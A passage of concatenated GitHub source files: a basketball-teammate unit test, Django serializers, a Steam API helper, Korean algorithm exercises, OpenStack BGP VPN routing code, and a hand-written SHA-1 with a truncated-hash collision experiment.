self.dict2['thornma01'].teammates) == 0)\n\n self.assertIsNone(self.dict['landrca01'].teammates.get('rodrise01'))\n self.assertIsNotNone(self.dict['landrca01'].teammates.get('dorsejo01'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"simarchhabra/NBA-Teammate-Chain","sub_path":"tests/test_serialize_teammates.py","file_name":"test_serialize_teammates.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23744752059","text":"from django.db import transaction\nfrom rest_framework import pagination, serializers\n\nfrom books.models import Book\nfrom users.serializers import CurrentUserSerializer\n\nfrom .models import Profile\n\n\nclass RelationPaginator(pagination.PageNumberPagination):\n \"\"\"For nested serializer pagination\"\"\"\n\n def get_paginated_response(self, data):\n return {\n \"count\": self.page.paginator.count,\n \"next\": self.get_next_link(),\n \"previous\": self.get_previous_link(),\n \"results\": data,\n }\n\n\nclass ProfileBookSerializer(serializers.HyperlinkedModelSerializer):\n author = serializers.StringRelatedField(many=True)\n\n class Meta:\n model = Book\n fields = [\"id\", \"title\", \"author\", \"cover_image\"]\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n user = serializers.CharField(default=\"user.username\", read_only=True)\n email = serializers.EmailField(source=\"user.email\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n\n def update(self, instance, validated_data):\n with transaction.atomic():\n user_data = validated_data.pop(\"user\")\n user = instance.user\n\n user_ser = CurrentUserSerializer(instance=user, data=user_data)\n if user_ser.is_valid():\n user_ser.save()\n\n return super().update(instance, validated_data)\n\n class Meta:\n model = Profile\n fields = [\n \"id\",\n \"user\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"birth_date\",\n \"about\",\n ]\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is for displaying a user favorite books list\n \"\"\"\n\n user = serializers.CharField(source=\"user.username\", read_only=True)\n email = serializers.EmailField(source=\"user.email\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n\n favorite_list = serializers.SerializerMethodField(read_only=True)\n\n def get_favorite_list(self, obj):\n # books = Book.objects.filter(favorite=obj.user.id)\n books = obj.user.favorite_books.all()\n serializer = ProfileBookSerializer(books, many=True, context=self.context)\n # context=self.context: to display the url of the image\n paginator = RelationPaginator()\n paginate_data = paginator.paginate_queryset(\n queryset=serializer.data, request=self.context[\"request\"]\n )\n result = paginator.get_paginated_response(paginate_data)\n return result\n\n class Meta:\n model = Profile\n fields = [\n \"id\",\n \"user\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"birth_date\",\n \"about\",\n \"favorite_list\",\n ]\n","repo_name":"Hosseinht/bookland","sub_path":"profiles/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73797901561","text":"# _*_ coding:utf-8 _*_\nimport requests\nfrom bs4 import BeautifulSoup as bs\nfrom xml.dom import minidom\nimport json\n\n\nclass UserDoesNotExistError(Exception):\n pass\n\n\nclass User(object):\n\n def __init__(self, steamID64, api_key):\n self.steamID64 = steamID64\n self.api_key = api_key\n\n def check_account(self):\n url = \"http://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key={}&steamids={}\".format(\n self.api_key,\n self.steamID64\n )\n d = json.loads(requests.get(url).content)\n if not d[\"response\"][\"players\"]:\n raise UserDoesNotExistError\n else:\n return d[\"response\"][\"players\"][0][\"personaname\"]\n\n def get_whishlist(self):\n url = \"http://steamcommunity.com/profiles/{}/wishlist\".format(\n self.steamID64\n )\n r = requests.get(url)\n soup = bs(r.content, \"html.parser\")\n wish_games = soup.findAll(\"div\", \"wishlistRow\")\n game_ids = [i[\"id\"].split(\"_\")[-1] for i in wish_games]\n return game_ids\n\n @staticmethod\n def get_id_from_customURL(customURL):\n url = \"http://steamcommunity.com/id/{}/?xml=1\".format(\n customURL\n )\n dom = minidom.parseString(\n requests.get(url).content\n )\n steamID64 = dom.getElementsByTagName(\"steamID64\")[0].firstChild.data\n return steamID64\n","repo_name":"KururuSouchou/steambot","sub_path":"steam_api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42520126075","text":"# 예제 4-1: 상하좌우\n# 문제: N x N 크기의 정사각형 그리드 위에서 [L, R, U, D] 인풋에 따라 좌우로 이동한다.\n# 이때, 시작점은 (1, 1) 이며 그리드 밖으로 이동하게 만드는 커맨드는 무시한다.\n\n# 내 답안:\n\n# Receive inputs\nn = int(input())\nplans = input().split()\n\nx, y = 1, 1\nnx, ny = 0, 0\n\n# Movement according to L, R, U, D\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\ncommand_types = ['L', 'R', 'U', 'D']\n\n# Iterate through each plan and compare with command types\nfor plan in plans:\n for i in range(len(command_types)):\n if plan == command_types[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n # Ignore if person escapes the map\n if nx < 1 or ny < 1 or nx > n or ny > n:\n continue\n # Move\n x, y = nx, ny\n\nprint(nx, ny)\n\n# 예제 4-2: 시각\n# 문제: 정수 N이 입력되면 00시 00분 00초부터 N시 59분 59초까지의 모든 시각 중에서 3이 하나라도 포함되는\n# 모든 경우의 수를 구하는 프로그램을 작성하시오.\n\n# 내 풀이\nn = int(input())\ncount = 0\n\nfor i in range(n + 1):\n for j in range(60):\n for k in range(60):\n if '3' in str(i) + str(j) + str(k):\n count += 1\n\nprint(count)\n\n# 예제 4-3: 왕실의 나이트\n# 문제: 8 x 8 체스판에서 나이트는 2 x 1 만큼 이동할 수 있다.\n# 나이트의 현 위치가 주어졌을 때 이동할 수 있는 경로의 경우의 수를 출력하라.\n\n# Receive current position\npos = input()\nrow = int(pos[1])\ncol = int(ord(pos[0]) - ord('a')) + 1\n\n# Define possible movements\nsteps = [(-2, -1), (-2, 1), (2, -1), (2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2)]\n\n# Check if movement is possible\ncounter = 0\nfor step in steps:\n next_row = row + step[0]\n next_col = col + step[1]\n # Increase counter if possible\n if next_row >= 1 and next_row <= 8 and next_col >= 1 and next_col <= 8:\n counter += 1\n\nprint(counter)\n\n# 앞서 '상하좌우' 문제에서는 dx, dy 리스트를 선언하여 이동할 방향을 기록할 수 있도록 하였다면\n# 이번 소스코드에서는 steps 변수가 dx와 dy 변수의 기능을 대신하여 수행한다.\n# 2가지 형태 모두 자주 사용되므로, 참고하도록 하자.\n\n# 예제 4-3: 게임 개발\n# 문제: 1 x 1 의 정사각형으로 이뤄진 N x M 크기의 직사각형 맵이 있다.\n# 각각의 칸은 츅지 또는 바다이고 캐릭터는 동서남북 중 한 곳을 바라본다.\n# 맵의 각 칸은 (A, B) 로 나타내며 A는 북쪽으로부터, B는 서쪽으로부터 떨어진 칸의 개수이다.\n# 캐릭터는 상하좌우로 움직일 수 있고, 바다로 되어 있는 공간에는 갈 수 없다.\n\n# 캐릭터 매뉴얼:\n# 1. 현재 위치에서 현재 방향을 기준으로 왼쪽 방향부터 차례대로 갈 곳을 정함.\n# 2. 캐릭터의 ���로 왼쪽 방향에 아직 가보지 않은 칸이 존재한다면, 왼쪽 방향으로 회전한 다음 전진함.\n# 3. 왼쪽 방향에 가보지 않은 칸이 없다면, 왼쪽 방향으로 회전만 하고 1단계로 돌아감.\n# 3. 만약 네 방향 모두 이미 가본 칸이거나 바다로 되어 있는 칸인 경우에는, 바라보는 방향을 유지한 채로\n# 한 칸 뒤로 가고 1단계로 돌아간다. 단, 이때 뒤쪽 방향이 바다인 칸이라 뒤로 갈 수 없는 경우에는 멈춘다.\n\n# 중요 테크닉:\n# 문제에선 각 방향을 나타내는 정수를 다음과 같이 명시한다:\n# - 0: 북쪽\n# - 1: 동쪽\n# - 2: 남쪽\n# - 3: 서쪽\n# 일반적으로 방향을 설정해서 이동하는 문제 유형에서는 dx, dy 라는 별도의 리스트를 만들어 방향을 정하는 것이 효과적\n# 예를 들면, 현재 캐릭터가 북쪽을 바라보고 있을 때는 북쪽으로 이동하기 위해 x, y 좌표를 각각 dx[0], dy[0] 씩 더함\n\n# Receive N x M\nn, m = map(int, input().split())\n\n# Create a map to record character movement\nd = [[0] * m for _ in range(n)]\n# Receive current character orientation\nx, y, direction = map(int, input().split())\nd[x][y] = 1\n\n# Receive entire map info\narray = []\nfor i in range(n):\n array.append(list(map(int, input().split())))\n\n# Define N, E, S, W\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# Turn left\ndef turn_left():\n global direction\n direction -= 1\n if direction == -1:\n direction = 3\n\n# Begin simulation\ncount = 1\nturn_time = 0\nwhile True:\n # Turn left\n turn_left()\n nx = x + dx[direction]\n ny = y + dy[direction]\n # If there is an unexplored space ahead, onward\n if d[nx][ny] == 0 and array[nx][ny] == 0:\n d[nx][ny] = 1\n x, y = nx, ny\n count += 1\n turn_time = 0\n continue\n # If there is no unexplored land or there's the ocean\n else:\n turn_time += 1\n # Can't go either direction\n if turn_time == 4:\n nx = x - dx[direction]\n ny = y - dy[direction]\n # If you can go backward, do so\n if array[nx][ny] == 0:\n x, y = nx, ny\n # If not\n else:\n break\n turn_time = 0\n\n# Print output\nprint(count)","repo_name":"joodevs/algorithm-basics","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71322228921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 26 07:23:37 2017\n\n@author: ashwin\n\"\"\"\ndef number():\n s = input(\"Enter the string in which you want to search :\")\n s1 = input(\"Enter the string which you want to search :\")\n n= 0\n i = 0\n for i in range(0,len(s)):\n if s[i:i+len(s1)] == s1 :\n n += 1\n i += 1\n print ('Number of times', s1 ,'occurs is:',n)\n u = input(\"Do you want to try another number? (Reply with yes/no)\")\n if u.lower == 'yes':\n number()\nnumber()","repo_name":"ashsek/Competetive-Codes","sub_path":"Code Chef/string finder.py","file_name":"string finder.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25353692173","text":"import abc\nimport itertools\n\nfrom networking_bagpipe.bagpipe_bgp.common import exceptions as exc\nfrom networking_bagpipe.bagpipe_bgp.common import log_decorator\nfrom networking_bagpipe.bagpipe_bgp.common import looking_glass as lg\nfrom networking_bagpipe.bagpipe_bgp.common import utils\nfrom networking_bagpipe.bagpipe_bgp import constants\nfrom networking_bagpipe.bagpipe_bgp import engine\nfrom networking_bagpipe.bagpipe_bgp.engine import exa\nfrom networking_bagpipe.bagpipe_bgp.engine import flowspec\nfrom networking_bagpipe.bagpipe_bgp.engine import ipvpn as ipvpn_routes\nfrom networking_bagpipe.bagpipe_bgp.vpn import dataplane_drivers as dp_drivers\nfrom networking_bagpipe.bagpipe_bgp.vpn import vpn_instance\n\nDEFAULT_ADDR_PREFIX = '0.0.0.0/0'\n\n\nclass VPNInstanceDataplane(dp_drivers.VPNInstanceDataplane,\n metaclass=abc.ABCMeta):\n\n @abc.abstractmethod\n def add_dataplane_for_traffic_classifier(self, classifier,\n redirect_to_instance_id):\n pass\n\n @abc.abstractmethod\n def remove_dataplane_for_traffic_classifier(self, classifier):\n pass\n\n\nclass DummyVPNInstanceDataplane(dp_drivers.DummyVPNInstanceDataplane,\n VPNInstanceDataplane):\n\n def add_dataplane_for_traffic_classifier(self, *args, **kwargs):\n raise Exception(\"not implemented\")\n\n def remove_dataplane_for_traffic_classifier(self, *args, **kwargs):\n raise Exception(\"not implemented\")\n\n\nclass DummyDataplaneDriver(dp_drivers.DummyDataplaneDriver):\n type = constants.IPVPN\n dataplane_instance_class = DummyVPNInstanceDataplane\n\n\nclass VRF(vpn_instance.VPNInstance, lg.LookingGlassMixin):\n # component managing a VRF:\n # - calling a driver to instantiate the dataplane\n # - registering to receive routes for the needed route targets\n # - calling the driver to setup/update/remove routes in the dataplane\n # - cleanup: calling the driver, unregistering for BGP routes\n\n type = constants.IPVPN\n afi = exa.AFI.ipv4\n safi = exa.SAFI.mpls_vpn\n\n @log_decorator.log\n def __init__(self, *args, **kwargs):\n vpn_instance.VPNInstance.__init__(self, *args, **kwargs)\n self.readvertised = set()\n\n def needs_cleanup_assist(self, afi, safi):\n if (afi, safi) == (self.afi, exa.SAFI.flow_vpn):\n return True\n else:\n return self.dataplane.needs_cleanup_assist()\n\n @classmethod\n def validate_convert_params(cls, params, also_mandatory=()):\n return super(VRF, cls).validate_convert_params(\n params,\n also_mandatory=tuple(set(also_mandatory) | set(['ip_address'])))\n\n @classmethod\n def validate_convert_attach_params(cls, params):\n super(VRF, cls).validate_convert_attach_params(params)\n if 'gateway_ip' not in params:\n raise exc.APIMissingParameterException('gateway_ip')\n\n def _nlri_from(self, prefix, label, rd):\n assert rd is not None\n\n return ipvpn_routes.IPVPNRouteFactory(\n self.afi, prefix, label, rd,\n self.dp_driver.get_local_address())\n\n def generate_vif_bgp_route(self, mac_address, ip_prefix, plen, label, rd):\n # Generate BGP route and advertise it...\n nlri = self._nlri_from(\"%s/%s\" % (ip_prefix, plen), label, rd)\n\n return engine.RouteEntry(nlri)\n\n def _get_local_labels(self):\n for port_data in self.mac_2_localport_data.values():\n yield port_data['label']\n\n def _get_route_params_for_endpoint(self, endpoint):\n port_data = self.mac_2_localport_data[endpoint[0]]\n label = port_data['label']\n lb_consistent_hash_order = port_data[\n 'lb_consistent_hash_order']\n rd = self.endpoint_2_rd[endpoint]\n\n return (label, rd, lb_consistent_hash_order)\n\n def _imported(self, route):\n return len(set(route.route_targets).intersection(set(self.import_rts))\n ) > 0\n\n def _to_readvertise(self, route):\n rt_records = route.ecoms(exa.RTRecord)\n self.log.debug(\"RTRecords: %s (readvertise_to_rts:%s)\",\n rt_records,\n self.readvertise_to_rts)\n\n readvertise_targets_as_records = [exa.RTRecord.from_rt(rt)\n for rt in self.readvertise_to_rts]\n\n if self.attract_traffic:\n readvertise_targets_as_records += [exa.RTRecord.from_rt(rt)\n for rt in self.attract_rts]\n\n if set(readvertise_targets_as_records).intersection(set(rt_records)):\n self.log.debug(\"not to re-advertise because one of the readvertise\"\n \" or attract-redirect RTs is in RTRecords: %s\",\n set(readvertise_targets_as_records)\n .intersection(set(rt_records)))\n return False\n\n return len(set(route.route_targets).intersection(\n set(self.readvertise_from_rts)\n )) > 0\n\n def _gen_rtrecords_extended_community(self, ecoms):\n # new RTRecord = original RTRecord (if any) + orig RTs converted into\n # RTRecord attributes\n orig_rtrecords = ecoms(exa.RTRecord)\n rts = ecoms(exa.RTExtCom)\n add_rtrecords = [exa.RTRecord.from_rt(rt) for rt in rts]\n\n return list(set(orig_rtrecords) | set(add_rtrecords))\n\n def _route_for_readvertisement(self, route, endpoint):\n label, rd, lb_consistent_hash_order = (\n self._get_route_params_for_endpoint(endpoint)\n )\n self.log.debug(\"Prefix %s (re-)advertisement with label %s and route \"\n \"distinguisher %s\", route.nlri.cidr.prefix(), label, rd)\n nlri = self._nlri_from(route.nlri.cidr.prefix(), label, rd)\n\n attributes = exa.Attributes()\n\n ecoms = self._gen_encap_extended_communities()\n ecoms.communities += (\n self._gen_rtrecords_extended_community(route.ecoms)\n )\n ecoms.communities.append(\n exa.ConsistentHashSortOrder(lb_consistent_hash_order))\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for (re-)advertisement: %s\", entry)\n return entry\n\n def _default_route_for_advertisement(self, endpoint):\n label, rd, lb_consistent_hash_order = (\n self._get_route_params_for_endpoint(endpoint)\n )\n self.log.debug(\"Default route (re-)advertisement with label %s and \"\n \"route distinguisher %s\", label, rd)\n nlri = self._nlri_from(DEFAULT_ADDR_PREFIX, label, rd)\n\n attributes = exa.Attributes()\n\n ecoms = self._gen_encap_extended_communities()\n ecoms.communities.append(\n exa.ConsistentHashSortOrder(lb_consistent_hash_order))\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for default prefix advertisement: %s\",\n entry)\n return entry\n\n @log_decorator.log\n def _routes_for_attract_static_dest_prefixes(self, endpoint):\n if not self.attract_static_dest_prefixes:\n return\n\n label, rd, _ = self._get_route_params_for_endpoint(endpoint)\n\n for prefix in self.attract_static_dest_prefixes:\n nlri = self._nlri_from(prefix, label, rd)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts)\n self.log.debug(\"RouteEntry for attract static destination prefix: \"\n \"%s\", entry)\n yield entry\n\n @log_decorator.log\n def _route_for_redirect_prefix(self, prefix):\n prefix_classifier = utils.dict_camelcase_to_underscore(\n self.attract_classifier)\n prefix_classifier['destination_prefix'] = prefix\n\n traffic_classifier = vpn_instance.TrafficClassifier(\n **prefix_classifier)\n self.log.debug(\"Advertising prefix %s for redirection based on \"\n \"traffic classifier %s\", prefix, traffic_classifier)\n rules = traffic_classifier.map_traffic_classifier_2_redirect_rules()\n\n return self.synthesize_redirect_bgp_route(rules)\n\n def _redirect_route_for_readvertisement(self, route):\n # Create a FlowSpec NLRI with distinct RD and a copy of rules from\n # FlowSpec route to readvertise\n nlri = flowspec.FlowRouteFactory(self.afi, self.instance_rd)\n nlri.rules = route.nlri.rules\n\n attributes = exa.Attributes()\n\n ecoms = exa.ExtendedCommunities()\n ecoms.communities += (\n self._gen_rtrecords_extended_community(route.ecoms)\n )\n assert len(self.attract_rts) == 1\n rt = self.attract_rts[0]\n ecoms.communities.append(\n exa.TrafficRedirect(exa.ASN(int(rt.asn)), int(rt.number))\n )\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for redirect (re-)advertisement: %s\", entry)\n return entry\n\n @log_decorator.log\n def _readvertise(self, route):\n nlri = route.nlri\n\n self.log.debug(\"Start re-advertising %s from VRF\", nlri)\n if self.attract_traffic:\n # Start advertising default route only when the first route to\n # readvertise appears\n if not self.readvertised:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Start advertising default route from VRF \"\n \"%d to redirection VRF\", self.instance_id)\n self._advertise_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if isinstance(nlri, flowspec.Flow):\n # Readvertise FlowSpec route\n self._advertise_route(\n self._redirect_route_for_readvertisement(route)\n )\n else:\n # Advertise FlowSpec route for prefix\n self._advertise_route(\n self._route_for_redirect_prefix(nlri.cidr.prefix())\n )\n\n else:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Start re-advertising %s from endpoint %s\",\n nlri.cidr.prefix(), endpoint)\n self._advertise_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n self.readvertised.add(route)\n\n @log_decorator.log\n def _readvertise_stop(self, route, last):\n nlri = route.nlri\n\n if last:\n self.log.debug(\"Stop re-advertising %s from VRF\", nlri)\n if self.attract_traffic:\n # Stop advertising default route only if the withdrawn route is\n # the last of the routes to readvertise\n if len(self.readvertised) == 1:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Stop advertising default route from \"\n \"VRF to redirection VRF\")\n self._withdraw_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if isinstance(nlri, flowspec.Flow):\n # Withdraw readvertised FlowSpec route\n self._withdraw_route(\n self._redirect_route_for_readvertisement(route)\n )\n else:\n # Withdraw FlowSpec route for prefix\n self._withdraw_route(\n self._route_for_redirect_prefix(nlri.cidr.prefix())\n )\n else:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Stop re-advertising %s from endpoint %s\",\n nlri.cidr.prefix(), endpoint)\n route_entry = (\n self._route_for_readvertisement(route, endpoint)\n )\n self._withdraw_route(route_entry)\n\n self.readvertised.remove(route)\n\n @log_decorator.log_info\n def vif_plugged(self, mac_address, ip_address_prefix, localport,\n advertise_subnet=False, lb_consistent_hash_order=0,\n local_pref=None, **kwargs):\n super(VRF, self).vif_plugged(mac_address, ip_address_prefix,\n localport, advertise_subnet,\n lb_consistent_hash_order, local_pref,\n **kwargs)\n\n if vpn_instance.forward_to_port(kwargs.get('direction')):\n endpoint = (mac_address, ip_address_prefix)\n for route in itertools.chain(\n self.readvertised,\n self._routes_for_attract_static_dest_prefixes(endpoint)):\n self.log.debug(\"Re-advertising %s with this port as next hop\",\n route.nlri)\n if self.attract_traffic:\n self._advertise_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if self.has_only_one_endpoint():\n self._advertise_route(self._route_for_redirect_prefix(\n route.nlri.cidr.prefix()))\n else:\n self._advertise_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n @log_decorator.log_info\n def vif_unplugged(self, mac_address, ip_address_prefix):\n endpoint = (mac_address, ip_address_prefix)\n direction = self.endpoint_2_direction[endpoint]\n if vpn_instance.forward_to_port(direction):\n for route in itertools.chain(\n self.readvertised,\n self._routes_for_attract_static_dest_prefixes(endpoint)):\n self.log.debug(\"Stop re-advertising %s\", route.nlri)\n if self.attract_traffic:\n self._withdraw_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if self.has_only_one_endpoint():\n self._withdraw_route(self._route_for_redirect_prefix(\n route.nlri.cidr.prefix()))\n else:\n self._withdraw_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n super(VRF, self).vif_unplugged(mac_address, ip_address_prefix)\n\n # Callbacks for BGP route updates (TrackerWorker) ########################\n\n def route_to_tracked_entry(self, route):\n if isinstance(route.nlri, ipvpn_routes.IPVPN):\n return route.nlri.cidr.prefix()\n elif isinstance(route.nlri, flowspec.Flow):\n return (flowspec.Flow, route.nlri._rules())\n else:\n self.log.error(\"We should not receive routes of type %s\",\n type(route.nlri))\n return None\n\n @utils.synchronized\n @log_decorator.log\n def new_best_route(self, entry, new_route):\n\n if self.readvertise:\n # check if this is a route we need to re-advertise\n self.log.debug(\"route RTs: %s\", new_route.route_targets)\n self.log.debug(\"readv from RTs: %s\", self.readvertise_from_rts)\n if self._to_readvertise(new_route):\n self.log.debug(\"Need to re-advertise %s\", entry)\n self._readvertise(new_route)\n\n if not self._imported(new_route):\n self.log.debug(\"No need to setup dataplane for:%s\", entry)\n return\n\n if isinstance(new_route.nlri, flowspec.Flow):\n if len(new_route.ecoms(exa.TrafficRedirect)) == 1:\n traffic_redirect = new_route.ecoms(exa.TrafficRedirect)\n redirect_rt = \"%s:%s\" % (traffic_redirect[0].asn,\n traffic_redirect[0].target)\n\n self.start_redirect_traffic(redirect_rt,\n new_route.nlri.rules)\n else:\n self.log.warning(\"FlowSpec action or multiple traffic \"\n \"redirect actions not supported: %s\",\n new_route.ecoms())\n else:\n prefix = entry\n\n encaps = self._check_encaps(new_route)\n if not encaps:\n return\n\n assert len(new_route.nlri.labels.labels) == 1\n\n lb_consistent_hash_order = 0\n if new_route.ecoms(exa.ConsistentHashSortOrder):\n lb_consistent_hash_order = new_route.ecoms(\n exa.ConsistentHashSortOrder)[0].order\n\n self.dataplane.setup_dataplane_for_remote_endpoint(\n prefix, new_route.nexthop,\n new_route.nlri.labels.labels[0], new_route.nlri, encaps,\n lb_consistent_hash_order)\n\n @utils.synchronized\n @log_decorator.log\n def best_route_removed(self, entry, old_route, last):\n\n if self.readvertise:\n # check if this is a route we were re-advertising\n if self._to_readvertise(old_route):\n self.log.debug(\"Need to stop re-advertising %s\", entry)\n self._readvertise_stop(old_route, last)\n\n if isinstance(old_route.nlri, flowspec.Flow):\n if self._imported(old_route):\n if len(old_route.ecoms(exa.TrafficRedirect)) == 1:\n if last:\n traffic_redirect = old_route.ecoms(\n exa.TrafficRedirect)\n redirect_rt = \"%s:%s\" % (traffic_redirect[0].asn,\n traffic_redirect[0].target)\n\n self.stop_redirect_traffic(redirect_rt,\n old_route.nlri.rules)\n else:\n self.log.warning(\"FlowSpec action or multiple traffic \"\n \"redirect actions not supported: %s\",\n old_route.ecoms())\n else:\n prefix = entry\n\n # NOTE(tmorin): On new best routes, we only trigger dataplane\n # update events after checking with self._imported(...) that the\n # route was imported (and not a route that we receive because the\n # VRF should readvertise ir). On best_route_removed, we can't do\n # that because we could end up in a situation where:\n # - initially import_rts contains RT X\n # - we receive a route for RT X and install dataplane state\n # - the import_rts list is later updated and RT X is not anymore\n # part of the imported RTs, and the VRF unsubscribes from RT X\n # - we receive the best_route_removed callbacks corresponding to\n # the unsubscribe, but since the route is for no RT that is in\n # import_rts, we don't update the dataplane\n # The result would be to fail to remove dataplane state for this\n # route, so we're better not optimizing this case and remove\n # dataplane state, including possibly for routes that we did\n # not install in it.\n\n if self._skip_route_removal(last):\n self.log.debug(\"Skipping removal of non-last route because \"\n \"dataplane does not want it\")\n return\n\n # if we still have a route with same dataplane properties in\n # best routes, then we don't want to clear the dataplane entry\n if self.equivalent_route_in_best_routes(\n old_route,\n lambda r: (r.nexthop, r.nlri.labels.labels[0])):\n self.log.debug(\"Route for same dataplane is still in best \"\n \"routes, skipping removal\")\n return\n\n encaps = self._check_encaps(old_route)\n if not encaps:\n return\n\n assert len(old_route.nlri.labels.labels) == 1\n\n lb_consistent_hash_order = 0\n if old_route.ecoms(exa.ConsistentHashSortOrder):\n lb_consistent_hash_order = old_route.ecoms(\n exa.ConsistentHashSortOrder)[0].order\n\n self.dataplane.remove_dataplane_for_remote_endpoint(\n prefix, old_route.nexthop,\n old_route.nlri.labels.labels[0], old_route.nlri, encaps,\n lb_consistent_hash_order)\n\n # Looking glass ###\n\n def get_lg_map(self):\n return {\n \"readvertised\": (lg.SUBTREE, self.get_lg_readvertised_routes),\n }\n\n def get_lg_readvertised_routes(self, path_prefix):\n return [route.get_lg_local_info(path_prefix)\n for route in self.readvertised]\n","repo_name":"openstack/networking-bagpipe","sub_path":"networking_bagpipe/bagpipe_bgp/vpn/ipvpn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21095,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"6960644861","text":"from util import *\nfrom sys import stdout \n\n\ndef sha1(BB, verbose = False):\n\n h0 = toBinArray(0x67452301,32)\n h1 = toBinArray(0xEFCDAB89,32)\n h2 = toBinArray(0x98BADCFE,32)\n h3 = toBinArray(0x10325476,32)\n h4 = toBinArray(0xC3D2E1F0,32) \n\n B = preprocess(BB)\n\n if(verbose): print(len(B))\n\n ii = 1\n\n for chunk in chunks(B):\n \n \"\"\"\n print(\"chunck \" + str(ii))\n ii = ii+1\n\n print(chunk)\n\n print(nospace(h0))\n print(nospace(h1))\n print(nospace(h2))\n print(nospace(h3))\n print(nospace(h4))\n print(\" \")\n \"\"\"\n\n w = splitChunk(chunk)\n\n for i in range(16,80,1):\n w.append(LS(\n b_xor(\n b_xor(w[i-3],w[i-8]),\n b_xor(w[i-14],w[i-16])\n )\n )\n )\n\n index = 0\n if(verbose):\n for ww in w: \n print(str(index) + \" \" + prettyHex(toInt(ww),8))\n print(str(index) + \" \" + nospace(ww))\n index = index + 1\n \n #print(len(w))\n\n ha = h0\n hb = h1\n hc = h2\n hd = h3\n he = h4\n\n f = []\n\n for jj in range(0,20,1):\n f = b_or(\n b_and(hb,hc),\n b_and(b_not(hb),hd)\n )\n k = toBinArray(0x5A827999,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(20,40,1):\n f = b_xor(\n b_xor(hb,hc),\n hd\n )\n k = toBinArray(0x6ED9EBA1,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(40,60,1):\n f = b_or(\n b_or(\n b_and(hb,hc),\n b_and(hb,hd)\n ),\n b_and(hc,hd)\n )\n k = toBinArray(0x8F1BBCDC,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(60,80,1):\n f = b_xor(\n b_xor(hb,hc),\n hd\n )\n k = toBinArray(0xCA62C1D6,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n\n h0 = b_add(h0,ha)\n h1 = b_add(h1,hb)\n h2 = b_add(h2,hc)\n h3 = b_add(h3,hd)\n h4 = b_add(h4,he)\n\n hh = []\n\n for h in h0: hh.append(h)\n for h in h1: hh.append(h)\n for h in h2: hh.append(h)\n for h in h3: hh.append(h)\n for h in h4: hh.append(h)\n\n return hh\n\ndef attackBytes(barray1,barray2, length = 8, index = 0):\n\n #print(\"\")\n #print(len(barray1))\n #print(len(barray2))\n\n sha11 = sha1(barray1, verbose=False)\n sha12 = sha1(barray2, verbose=False)\n\n #print(\"sha1_1 = \" + prettyHex(toInt(sha11),20))\n #print(\"sha1_2 = \" + prettyHex(toInt(sha12),20))\n\n f1 = first32(sha11,length)\n f2 = first32(sha12,length)\n\n #print(first32(sha11))\n #print(first32(sha12))\n\n d1 = dict()\n d2 = dict()\n\n d1[f1] = -1\n d2[f2] = -1\n\n s1 = 0\n s2 = 0\n\n for i in range(1<<32):\n \n seed = random.randrange(1<<20)\n #seed = i\n\n selection = genSelection(seed,index)\n f1 = first32(sha1(mutate(barray1,selection)),length)\n f2 = first32(sha1(mutate(barray2,selection)),length)\n\n #print(f1,f2)\n\n #print(barray1)\n\n d1[f1] = seed\n d2[f2] = seed\n\n if(i%100 == 0 and i!=0): \n print(\".\",end = \"\")\n stdout.flush()\n 